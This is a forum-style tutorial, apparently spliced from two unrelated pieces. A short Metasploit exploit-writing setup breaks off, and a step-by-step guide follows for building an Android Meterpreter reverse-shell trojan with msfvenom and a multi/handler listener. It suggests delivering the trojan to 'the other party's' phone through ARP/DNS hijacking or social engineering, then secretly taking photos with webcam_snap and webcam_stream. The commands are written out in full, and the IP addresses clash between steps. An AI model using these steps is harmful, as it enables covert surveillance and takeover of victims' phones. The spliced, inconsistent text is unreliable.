Pawan Sharma Pawan Sharma

Types of Exploits
Types of Exploits in Metasploit:

1) Active

2) Passive

> The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.

- Setup
The software we will use in this tutorial include the following:

1) The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the freefloat FTP server.

Immunity debugger: This is used in creating exploits and reverse-engineering binary files. You can easily come by a good debugger available online for free.

2) Windows XP service pack 3 installed

Kali Linux: Obviously, the undisputed leading pen testing aid.

Mona.py: A Python-based plugin that helps with immunity debugging. Download Mona.py and move it to the immunity debugger directory (the py command folder).

ruforum

MSF is the abbreviation of Metasploit. Metasploit is an open source security vulnerability detection tool. It is very powerful. There are Windows and Linux versions. The tool integrates many vulnerabilities announced by Microsoft (0day).

The system I tested here is Backbox linux, which is a network penetration and information security assessment system. Many tools are installed inside. MSF comes with it. Of course there are others such as Kali linux, Back Track, etc.

Environment: Backbox linux+MSF

Target: an Android phone

Since it is hacking an Android phone, an Android Trojan horse must be configured first, then let’s take a look at the IP of the machine

🅁🅄🄽 :

Local IP: 192.168.XZA.XYX

1) Enter the command in the terminal: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R> /root/apk.apk

The old version of MSF used msfpayload to generate Trojans. Now msfvenom is used instead in the new version, so some friends will prompt when they enter msfpayload in the terminal.

2) msfpayload cannot find the command, so just use msfvenom, where LHOST corresponds to the IP address of the machine. LPORT corresponds to the port you want to monitor and then generates the path of the Trojan.

3) In this way, we have generated an APK Android Trojan file in the /root/ path. As for the Trojan-free killing, let's leave it alone. Now we are starting the MSF tool

Enter the command: msfconsole

🦑Then enter:

4) use exploit/multi/handler to load the module

5) set payload android/meterpreter/reverse_tcp select Payload

6) show options view parameter settings

7) We see that there are two parameters in the payload to set LHOST and LPORT, which means the address and port. The default port is 4444. Now let’s change the settings.

🅁🅄🄽 :

1) set LHOST 192.168.1.6 The address here is set to the IP address of the Trojan we just generated

2) set LPORT 5555 The port here is set to the port that we just generated the Trojan to monitor

3) The exploit starts to execute the vulnerability and starts monitoring...

OK, all preparations are ready. . . What we have to do now is to get the Trojan horse file on the other’s mobile phone. There are many ways to use DNS arp hijacking to deceive. As long as the other party downloads the file with the mobile phone, it will download our Trojan file.

4) There are social workers and so on, here I will simply put the Trojan horse file on my own phone for testing

5) After the installation is complete, a MainActivity program icon will be generated on the desktop. This is the Trojan we just generated. When we click on this icon, the phone will have no response. Its solid wood horse has started to run.

We can see in our MSF that there is a session connecteD

6) In this way, the other party’s mobile phone is controlled by us. To view the mobile phone system information, enter the command sysinfo





webcam_list Check how many camera heads there are on the phone. The two displayed here indicate that there are two front and rear cameras.



webcam_snap hidden camera function

7) Follow the parameter -i to specify which camera to take pictures

You can see that we took photos of the front and rear cameras and saved them on the desktop

You can also enter the command webcam_stream to turn on the camera

enjoy❤️👍🏻